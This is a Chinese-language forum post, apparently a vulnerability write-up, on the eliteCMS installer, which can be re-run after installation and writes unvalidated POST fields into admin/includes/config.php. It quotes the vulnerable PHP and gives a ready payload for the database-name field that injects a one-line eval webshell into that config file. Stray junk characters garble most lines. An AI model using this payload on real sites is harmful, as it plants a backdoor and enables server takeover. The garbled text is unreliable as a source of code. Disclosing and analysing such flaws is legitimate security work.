eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装' ~" l) b9 p" v" h' n6 s
+ u/ k7 D$ v. S! r7 C1 n& N% x* M
另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php/ {+ p5 }! U# K
我们来看代码:
) s' c1 L- V+ m# j ; V* k5 `$ |0 W4 o2 I. C
...
% A) ?, g8 j6 c! l' l! Eelseif ($_GET['step'] == "4") {
g+ p' l6 q$ I/ z $file = "../admin/includes/config.php";
! M/ c' C+ L: x4 ?2 k $write = "<?php\n";+ b$ Z5 z- y) D/ F- W2 t
$write .= "/**\n";9 }4 q- V. {" P2 Z1 h
$write .= "*\n";5 B5 g7 R; I! Q% U: k8 B
$write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
: T9 O& K3 I7 D...略...3 S9 K) t8 _7 h8 ?- H
$write .= "*\n";. J. W0 B$ [- \2 S" l: I
$write .= "*/\n";) F+ l' ]' k4 X* W# @
$write .= "\n";1 }1 w: m/ ^, d y
$write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
" Y7 a) I: H% e% W4 ^ $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";# C" ] R0 n$ S, }2 `
$write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";7 h2 T# f5 s( m s2 X
$write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";+ R7 `6 f! [' i6 T
$write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";& H: O* U; z9 @# d% p
$write .= "if (!\$connection) {\n";, o5 o& f8 i0 L2 P+ O: F
$write .= " die(\"Database connection failed\" .mysql_error());\n";
1 J l/ O( M. W8 u $write .= " \n";6 n. {; U, _, @( O# W) K/ ~; {
$write .= "} \n";
& E) t/ l& [# L( `1 ^ $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";4 g3 q( L. K" [) f
$write .= "if (!\$db_select) {\n";2 Q. G' r: ^1 u* x, S) `2 x
$write .= " die(\"Database select failed\" .mysql_error());\n";
9 ^! s1 Z$ @+ Y; [ $write .= " \n";. j: ?5 \ f+ `& K0 a! i, F
$write .= "} \n";
. a2 _, |; T( m3 U $write .= "?>\n";7 F( q/ [3 h J: H0 p, R
; Z. |; K+ d! t4 ?" }
$writer = fopen($file, 'w');1 c$ b% d# L0 x% [6 @
...( _1 Q2 {( ^! _5 R: {
# _# d3 H; j3 P) C! i& ]
在看代码:5 n' V9 ^- K* r7 u) S
3 m0 l* [/ j9 K& d8 w' {7 r
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
6 _# m1 P: R% H$_SESSION['DB_NAME'] = $_POST['DB_NAME'];8 [8 ^3 ~4 ^/ i
$_SESSION['DB_USER'] = $_POST['DB_USER'];
- {1 s, g% y; y( }: t0 B% w$_SESSION['DB_PASS'] = $_POST['DB_PASS'];/ v- w. Q8 X3 P+ ^, s$ M/ q& [
5 H# t2 F& _6 J5 w) e" e8 Z取值未作任何验证
7 F9 Z, E7 R( H2 m# ^* R如果将数据库名POST数据:1 X/ S4 Y/ r1 Y& A% A0 l
" H, i" e9 O$ u6 @+ {$ G0 J
"?><?php eval($_POST[c]);?><?php# l4 P |. x# ]: ?: T5 H
7 P* b3 f* x$ j) }将导致一句话后门写入/admin/includes/config.php
, ]. _: i) Y( c$ ~ |